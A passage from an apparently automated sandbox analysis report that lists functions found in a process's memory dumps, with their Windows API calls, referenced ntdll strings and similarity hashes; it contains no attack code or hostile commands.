                                      • Part of subcall function 011E00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000), ref: 011E00C1
                                      • Part of subcall function 011E00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,011DDF68,00000001,?,00000000,011E3458,-00000105,011FBDD8,00000240,011E4B82,00000000,00000000,011EAE6E,00000000,?), ref: 011E00C8
                                    • NtQueryInformationProcess.NTDLL(000000FF,00000027,?,00000004,00000000), ref: 011D5991
                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D59AF
                                    • NtSetInformationProcess.NTDLL(000000FF,00000027,?,00000004), ref: 011D5A17
                                    • longjmp.MSVCRT(0120B8B8,00000001,00000000), ref: 011E981B
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Process$Information$Heap$AllocCurrentDirectoryQuery_setjmp3longjmp
                                    • String ID: %9d
                                    • API String ID: 4212706909-2241623522
                                    • Opcode ID: b89fdad383df9a4a44298f93d2af6ecc927726763f3139db8341f21db931234f
                                    • Instruction ID: 076ada4763b7f5cd79016c0bda98e2724dde123a8b3f8abc480590b9f25c1222
                                    • Opcode Fuzzy Hash: b89fdad383df9a4a44298f93d2af6ecc927726763f3139db8341f21db931234f
                                    • Instruction Fuzzy Hash: B741C5B0D00315EFDB28DFA9A849A6ABFF4FB54728F10422EE624D7294DB704540CF91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D5226, Relevance: 9.5, APIs: 6, Instructions: 458COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011D528C
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00000000,?,?,-00000105,?,00000000,?), ref: 011D5394
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011D53D5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$FullNamePath
                                    • String ID:
                                    • API String ID: 3158150540-0
                                    • Opcode ID: 7c3cb870a0a0bf4b48a417cfc42239b6faf1400a7c6be65ed5152e79111d7c78
                                    • Instruction ID: 1d65ef8af689fd46dd4e42ec56fa2d9855fdb2b9851c476d235c6caa985d31c1
                                    • Opcode Fuzzy Hash: 7c3cb870a0a0bf4b48a417cfc42239b6faf1400a7c6be65ed5152e79111d7c78
                                    • Instruction Fuzzy Hash: A102B535A005199BDF2DDFA8CC986A9B7F2FF88318F1941E9D80997245D774AE82CF40
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E245C, Relevance: 9.2, APIs: 6, Instructions: 154fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00000000,00000000), ref: 011E24EC
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 011E2505
                                    • memcpy.MSVCRT ref: 011E2566
                                    • _wcsnicmp.MSVCRT ref: 011E25BC
                                    • _wcsicmp.MSVCRT ref: 011ED61E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Find$CloseFileFirst_wcsicmp_wcsnicmpmemcpy
                                    • String ID:
                                    • API String ID: 242869866-0
                                    • Opcode ID: de6a4b7375402375424036d3f698e5740b55eed9b4f24dc0db29432e51250165
                                    • Instruction ID: fd707ee37c3a39e8e56c084c0ecf49c5ba5a461ac25c78ef01de136c490cb250
                                    • Opcode Fuzzy Hash: de6a4b7375402375424036d3f698e5740b55eed9b4f24dc0db29432e51250165
                                    • Instruction Fuzzy Hash: 7551E5755047018BCB28CFA8DC685ABB7E9EFC8714F15492DF99AC3244EB30D945CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E7513, Relevance: 7.6, APIs: 5, Instructions: 51timethreadCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 011E7540
                                    • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E754F
                                    • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 011E7558
                                    • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 011E7561
                                    • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 011E7576
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                    • String ID:
                                    • API String ID: 1445889803-0
                                    • Opcode ID: ac9f1ae1da07457771ca0440c27a2869b638c5cfcaaa2793f40fc510ae5e922c
                                    • Instruction ID: 91f36294d6aba23adbd744778a569813f9453fb769e7d45e21dc8ef99227def7
                                    • Opcode Fuzzy Hash: ac9f1ae1da07457771ca0440c27a2869b638c5cfcaaa2793f40fc510ae5e922c
                                    • Instruction Fuzzy Hash: ED113A71D05208EBDF24DFF8E65C6AEBBF5EF58314F55486AD411E7248EB309A408B41
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011FA0D2, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                    Download Yara Rule
                                    APIs
                                    • memset.MSVCRT ref: 011FA118
                                      • Part of subcall function 011E0C70: ??_V@YAXPAX@Z.MSVCRT ref: 011E0CBA
                                      • Part of subcall function 011E0C70: memset.MSVCRT ref: 011E0CDD
                                    • GetDiskFreeSpaceExW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,-00000105,?,?,?), ref: 011FA1B5
                                    • ??_V@YAXPAX@Z.MSVCRT ref: 011FA225
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: memset$DiskFreeSpace
                                    • String ID: %5lu
                                    • API String ID: 2448137811-2100233843
                                    • Opcode ID: ebb02f2ffb30847b32b531025e7b0ba2a3c78bd1bdf5fa6874c0b213cc1816fe
                                    • Instruction ID: 87fd769d561e228706daa58c6bbd286e175035a5022efa5d7c3923d0a213f1a9
                                    • Opcode Fuzzy Hash: ebb02f2ffb30847b32b531025e7b0ba2a3c78bd1bdf5fa6874c0b213cc1816fe
                                    • Instruction Fuzzy Hash: 46417A71E002196BDF29DBA4DC99AEEB7B8FF18344F04409DE609A7141E7749E85CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A73D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                    Download Yara Rule
                                    Strings
                                    • Kernel-MUI-Language-Allowed, xrefs: 03A73DC0
                                    • Kernel-MUI-Language-SKU, xrefs: 03A73F70
                                    • WindowsExcludedProcs, xrefs: 03A73D6F
                                    • Kernel-MUI-Number-Allowed, xrefs: 03A73D8C
                                    • Kernel-MUI-Language-Disallowed, xrefs: 03A73E97
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
                                    • API String ID: 0-258546922
                                    • Opcode ID: 3f6027b0801fb41ad3016eef6bbc18c1c2a85cdf325d70d92e37f66719a8da8e
                                    • Instruction ID: 4773fa0e758005474dfb663ad7025f88ebb5f57fabb6da1a275df52405a54835
                                    • Opcode Fuzzy Hash: 3f6027b0801fb41ad3016eef6bbc18c1c2a85cdf325d70d92e37f66719a8da8e
                                    • Instruction Fuzzy Hash: 4FF14876D10658EFCB15DF99CA80AEEBBBDFF48650F15006BE415AB250E7349E01CBA0
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F1914, Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,011F1735), ref: 011F1932
                                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 011F1939
                                    • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,011F1735), ref: 011F1957
                                    • RtlFreeHeap.NTDLL(00000000), ref: 011F195E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Heap$FreeProcess
                                    • String ID:
                                    • API String ID: 3859560861-0
                                    • Opcode ID: 7fa54d8046fcaec72ed39ab8255b7baf4830f4fc760f2e6ce6597c242f6d95ab
                                    • Instruction ID: 7343d35b5ab0400354313713700172d81f559cc8d294384285f59823aef86930
                                    • Opcode Fuzzy Hash: 7fa54d8046fcaec72ed39ab8255b7baf4830f4fc760f2e6ce6597c242f6d95ab
                                    • Instruction Fuzzy Hash: 26F04F72610201ABDB24DFA0E88CBA5B7F8FF58326F10092DF641C6440EB74E5D5CBA1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E6FE3, Relevance: 6.0, APIs: 4, Instructions: 13COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E6FEA
                                    • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(011E7119,?,011E7119,011D1000), ref: 011E6FF3
                                    • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,011E7119,011D1000), ref: 011E6FFE
                                    • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,011E7119,011D1000), ref: 011E7005
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
                                    • String ID:
                                    • API String ID: 3231755760-0
                                    • Opcode ID: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                    • Instruction ID: 31835f397d3bad6aebd802a71f7ccd3bac52b24c836e675622d32b9b528a64e3
                                    • Opcode Fuzzy Hash: 14b00860cd93b38cd020d9d54970c92856937f214fa9e9bccdeaaf5e0bc664c8
                                    • Instruction Fuzzy Hash: 48D0C932580104ABCF20ABE1F81CA893E28EB9431AF044420F309C2014CE714491CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A98E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                    Download Yara Rule
                                    Strings
                                    • minkernel\ntdll\ldrsnap.c, xrefs: 03AD933B, 03AD9367
                                    • LdrpFindDllActivationContext, xrefs: 03AD9331, 03AD935D
                                    • Querying the active activation context failed with status 0x%08lx, xrefs: 03AD9357
                                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 03AD932A
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                    • API String ID: 0-3779518884
                                    • Opcode ID: 5e6e84f65524694d867cb5a82eca89d133de0f591d0d7a9a5fed44835cd769df
                                    • Instruction ID: 2993e5561fc1ac23576cd4acd8aa6d55ce5e53bc5744cb4be9461fc9b80d655a
                                    • Opcode Fuzzy Hash: 5e6e84f65524694d867cb5a82eca89d133de0f591d0d7a9a5fed44835cd769df
                                    • Instruction Fuzzy Hash: 7341D832A00315AEEF35EB18C969B76B7FCBB42648F0D416FD81577591E768DD808283
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F31DC, Relevance: 4.8, APIs: 3, Instructions: 274fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,011D250C,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 011F3362
                                    • FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000010), ref: 011F34BF
                                    • FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 011F34D6
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Find$File$CloseFirstNext
                                    • String ID:
                                    • API String ID: 3541575487-0
                                    • Opcode ID: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                    • Instruction ID: ea202249c0176331835fe5eea9022bca7728bbc3396f3b1e5b8ed8b726ba87c9
                                    • Opcode Fuzzy Hash: e32a7d8a12cdf5c9c43104cd3e186a55b9f45ed73193197bdd66b53308640b4c
                                    • Instruction Fuzzy Hash: EF9105357182028BCB2DEF68C85056FB7E2FFD8244B45892DEA66C7344EB31D946C792
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A78794, Relevance: 4.0, Strings: 3, Instructions: 255COMMON
                                    Download Yara Rule
                                    Strings
                                    • minkernel\ntdll\ldrsnap.c, xrefs: 03AC9C28
                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 03AC9C18
                                    • LdrpDoPostSnapWork, xrefs: 03AC9C1E
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                    • API String ID: 0-1948996284
                                    • Opcode ID: 417cd99acfba53c646b5bd91e0872dfca9fe7f89bcc5415b2465551d6e3e17b1
                                    • Instruction ID: fb08bbf335a5dfb0591b7bd6595f9e3314616090ef78b2a5120a7257c48f8d4e
                                    • Opcode Fuzzy Hash: 417cd99acfba53c646b5bd91e0872dfca9fe7f89bcc5415b2465551d6e3e17b1
                                    • Instruction Fuzzy Hash: 0591C271A00215AFDB18DF59C9CAABAB7BDFF45354B1840AFD806AB250D734ED01CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A77E41, Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                    Download Yara Rule
                                    Strings
                                    • minkernel\ntdll\ldrmap.c, xrefs: 03AC98A2
                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 03AC9891
                                    • LdrpCompleteMapModule, xrefs: 03AC9898
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                    • API String ID: 0-1676968949
                                    • Opcode ID: 6a23aea072d9718fa3e28ecc36487880f9affe8c42a7a3bf075fd5dfd790d045
                                    • Instruction ID: 2dce7e4970281c5d00e76cf884609f219ece19947dd78148cf1fa38446ecc052
                                    • Opcode Fuzzy Hash: 6a23aea072d9718fa3e28ecc36487880f9affe8c42a7a3bf075fd5dfd790d045
                                    • Instruction Fuzzy Hash: 9351D0356107859BEB22CB68CE84B3AB7E4BF01714F1806AFE8619B7E1D771E900CB50
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A6E620, Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                    Download Yara Rule
                                    Strings
                                    • \Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 03A6E68C
                                    • InstallLanguageFallback, xrefs: 03A6E6DB
                                    • @, xrefs: 03A6E6C0
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
                                    • API String ID: 0-1757540487
                                    • Opcode ID: 18011dd209c14f8480c9a330c877c411b0a1b1fa5f05172121a409fea28371c2
                                    • Instruction ID: cc3b8f28202c96fc24f54a0ee14189b23650fbd4516a67f73d38a77afbf04677
                                    • Opcode Fuzzy Hash: 18011dd209c14f8480c9a330c877c411b0a1b1fa5f05172121a409fea28371c2
                                    • Instruction Fuzzy Hash: 4F51F67A9183459BC714DF26C540AABB3E9BF89614F09092FF985DB340F734E904C7A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011D443C, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 25COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,011F731D,?,?,?,?,?), ref: 011D4442
                                      • Part of subcall function 011D4476: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,Software\Microsoft\Windows NT\CurrentVersion,00000000,02000000,?), ref: 011D449A
                                      • Part of subcall function 011D4476: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,UBR,00000000,?,?,?), ref: 011D44BE
                                      • Part of subcall function 011D4476: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?), ref: 011D44C9
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: CloseOpenQueryValueVersion
                                    • String ID: %d.%d.%05d.%d
                                    • API String ID: 2996790148-3457777122
                                    • Opcode ID: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                    • Instruction ID: d8b87bb812f0a474e0cfd25c28be566a08f53c50b86f9a5a476e0c8d96e635ac
                                    • Opcode Fuzzy Hash: ef600167d06cfe25ab7ff4e52a1cbed5010b836bb5e328bfb8af34fe956f34b7
                                    • Instruction Fuzzy Hash: 26D02BB1B5013037D62C65AA1C5DE7B508DC6E8022744402EF80193285DBB85C1442B4
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03AE51BE, Relevance: 2.7, Strings: 2, Instructions: 173COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: InitializeThunk
                                    • String ID: Legacy$UEFI
                                    • API String ID: 2994545307-634100481
                                    • Opcode ID: 1e38c245e77a54f229982d62b08e97a2eb3ae79735b6dc8789905e8a286b025e
                                    • Instruction ID: b37c26b5d31a902b0ef5e0475a5faeec93a12fc206cd31a3117536dfd5850fcd
                                    • Opcode Fuzzy Hash: 1e38c245e77a54f229982d62b08e97a2eb3ae79735b6dc8789905e8a286b025e
                                    • Instruction Fuzzy Hash: B85168B1E00709AFDB24DFA8D990AAEBBF8BF49704F14442EE519EB251D771D900CB10
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A6B171, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: _vswprintf_s
                                    • String ID:
                                    • API String ID: 677850445-0
                                    • Opcode ID: 1cfb72e1ff042db56d1b356458c5737033da0c3432a9fa7cb6450ef649928008
                                    • Instruction ID: 372c7faa241ce3616ee1573622f10afe17593f6a847ff67f59a0c75368e9edb1
                                    • Opcode Fuzzy Hash: 1cfb72e1ff042db56d1b356458c5737033da0c3432a9fa7cb6450ef649928008
                                    • Instruction Fuzzy Hash: 4D51F275D242A98EDF32CF69C950BBEBBB4BF08310F1442AFD859AB281D77049418B94
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A8B944, Relevance: 1.7, APIs: 1, Instructions: 166COMMON
                                    Download Yara Rule
                                    APIs
                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03A8B9A5
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                    • String ID:
                                    • API String ID: 885266447-0
                                    • Opcode ID: 7c128067c87f2bae8216b62eb0716ee8cfb8d83f8b6c5910fcada1f20506fad2
                                    • Instruction ID: 6b56b989c161d6c98db9332f261af943fad8f127480fd284750fe7c3dabd2be0
                                    • Opcode Fuzzy Hash: 7c128067c87f2bae8216b62eb0716ee8cfb8d83f8b6c5910fcada1f20506fad2
                                    • Instruction Fuzzy Hash: 00514A71608741CFC720EF29C180A2AFBF9FB88614F14496FE5968B354D771E844CBA2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A92581, Relevance: 1.6, Strings: 1, Instructions: 329COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: PATH
                                    • API String ID: 0-1036084923
                                    • Opcode ID: 8a4dff06ab43131d3f827049caafccd3c90ae6f4465d6a93c7cfd172631a57b9
                                    • Instruction ID: 18f8536ddc23e80d2cca11c4fc25dad5c18369b239129f633a3bedd5213d9a52
                                    • Opcode Fuzzy Hash: 8a4dff06ab43131d3f827049caafccd3c90ae6f4465d6a93c7cfd172631a57b9
                                    • Instruction Fuzzy Hash: 98C13775E00219AFDF24DF99D981BADB7F5EF89704F08442BE911BB250E734A941CB60
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 03A9FAB0, Relevance: 1.6, Strings: 1, Instructions: 306COMMON
                                    Download Yara Rule
                                    Strings
                                    • *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!, xrefs: 03ADBE0F
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912726350.0000000003A40000.00000040.00000001.sdmp, Offset: 03A40000, based on PE: true
                                    • Associated: 0000000F.00000002.912978459.0000000003B5B000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912990654.0000000003B5F000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID:
                                    • String ID: *** ASSERT FAILED: Input parameter LanguagesBuffer for function RtlSetThreadPreferredUILanguages is not a valid multi-string!
                                    • API String ID: 0-865735534
                                    • Opcode ID: 15311a2f756669f0d35c045c703f4b6a9c7ebd4e9338143b84f3d3e78cff29df
                                    • Instruction ID: 5d334e646b7e8ac8a2eb673d53b2a78a2e1ef44391d36a81feb7091f2b53916a
                                    • Opcode Fuzzy Hash: 15311a2f756669f0d35c045c703f4b6a9c7ebd4e9338143b84f3d3e78cff29df
                                    • Instruction Fuzzy Hash: 7CA1D175B007058FEF25DF68C854B6AB3F5AB48616F0985AFE946EB780DB30D8418B90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011F2258, Relevance: 1.5, APIs: 1, Instructions: 34COMMON
                                    Download Yara Rule
                                    APIs
                                    • IsDebuggerPresent.API-MS-WIN-CORE-DEBUG-L1-1-0(?,00000006,?,011F2418), ref: 011F228B
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: DebuggerPresent
                                    • String ID:
                                    • API String ID: 1347740429-0
                                    • Opcode ID: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                    • Instruction ID: 62bec8d4ed78aa68b2ca6a63eafb7252236bc747a1e3d5367e4f69c6b4e06c6b
                                    • Opcode Fuzzy Hash: 78b97945a7e13964da642b551f13cd405f418daaf34820872e9f42c37f347781
                                    • Instruction Fuzzy Hash: 0AF02034A0412EAB8F38DFB9B50977A3BE8AB65704B41015DE907C7145CF30E9009B92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 011E7310, Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000172C0), ref: 011E7315
                                    Memory Dump Source
                                    • Source File: 0000000F.00000002.912036366.00000000011D0000.00000040.00000001.sdmp, Offset: 011D0000, based on PE: true
                                    • Associated: 0000000F.00000002.912070662.0000000001219000.00000040.00000001.sdmp Download File
                                    • Associated: 0000000F.00000002.912084501.000000000121D000.00000040.00000001.sdmp Download File
                                    Similarity
                                    • API ID: ExceptionFilterUnhandled
                                    • String ID:
                                    • API String ID: 3192549508-0
                                    • Opcode ID: b7cb22bbca189cae88a2d674bcad2cdad209ff327a4103c2058d88598af721dc
                                    • Instruction ID: 3ac6eef4a0fd1bf9d7958076283795cde8cc2069a6392bc08c55886776918096
                                    • Opcode Fuzzy Hash: b7cb22bbca189cae88a2d674bcad2cdad209ff327a4103c2058d88598af721dc
